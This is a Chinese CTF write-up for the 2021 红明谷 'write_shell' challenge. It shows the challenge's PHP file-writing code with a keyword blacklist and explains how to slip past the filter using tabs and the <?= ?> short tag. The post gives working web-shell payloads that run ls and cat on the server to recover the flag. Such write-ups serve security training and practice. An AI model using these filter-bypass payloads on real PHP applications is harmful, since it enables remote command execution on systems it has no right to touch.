[红明谷CTF 2021]write_shell

打开靶机,先上源码

<?php
// 禁止显示所有错误信息
error_reporting(0);

// 高亮显示当前文件的代码(用于调试)
highlight_file(__FILE__);

// check函数用于检查用户输入是否包含危险字符或关键词
function check($input){
    // 使用正则表达式检查是否包含危险字符或关键字
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // 如果包含危险字符,则终止执行,并显示"hacker!!!"的提示信息
        die('hacker!!!');
    }else{
        // 如果没有危险字符,则返回输入
        return $input;
    }
}

// waf函数用于对输入进行安全检查
function waf($input){
  // 如果输入是数组,则递归处理数组中的每一个元素
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);  // 递归调用waf函数
      }
  }else{
      // 如果输入不是数组,则对该输入进行check函数检查
      $input = check($input);
  }
}

// 定义目录路径:基于用户的IP地址创建一个唯一的目录
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';

// 如果目录不存在,则创建该目录
if(!file_exists($dir)){
    mkdir($dir);
}

// 根据传入的action参数执行不同的操作
switch($_GET["action"] ?? "") {
    case 'pwd':
        // 如果action参数为'pwd',则返回当前目录路径
        echo $dir;
        break;
    case 'upload':
        // 如果action参数为'upload',则获取data参数的内容
        $data = $_GET["data"] ?? "";
        
        // 调用waf函数进行输入检查
        waf($data);
        
        // 将处理后的数据写入到指定目录下的index.php文件中
        file_put_contents("$dir" . "index.php", $data);
}
?>

先用?action=pwd查看目录,记下访问该目录,访问该目录下index.php就是我们即将写入代码的目标文件
再讲讲写入,过滤的几个关键就是空格,php,; 一个一个来
空格过滤能用%09或\t来绕过,这两个符号都代表制表符,也就是平常使用的Tab键,四个空格
php主要针对php格式,换成<?= ?>就行了
至于;其实不用考虑 ?>会自动对最后一行起到;的作用
提一嘴php中 括起来的内容被认为是代码
构建payload:

?action=upload&data=<?=`ls\t/`?>`

在根目录里找到了flag,最终payload:

?action=upload&data=<?=`cat\t/flllllll1112222222lag`?>

flag{9f8b8390-ba06-4db5-a2b4-f5fbf71b6f0e}

posted @ 2024-11-11 23:41  m1saka1  阅读(23)  评论(0编辑  收藏  举报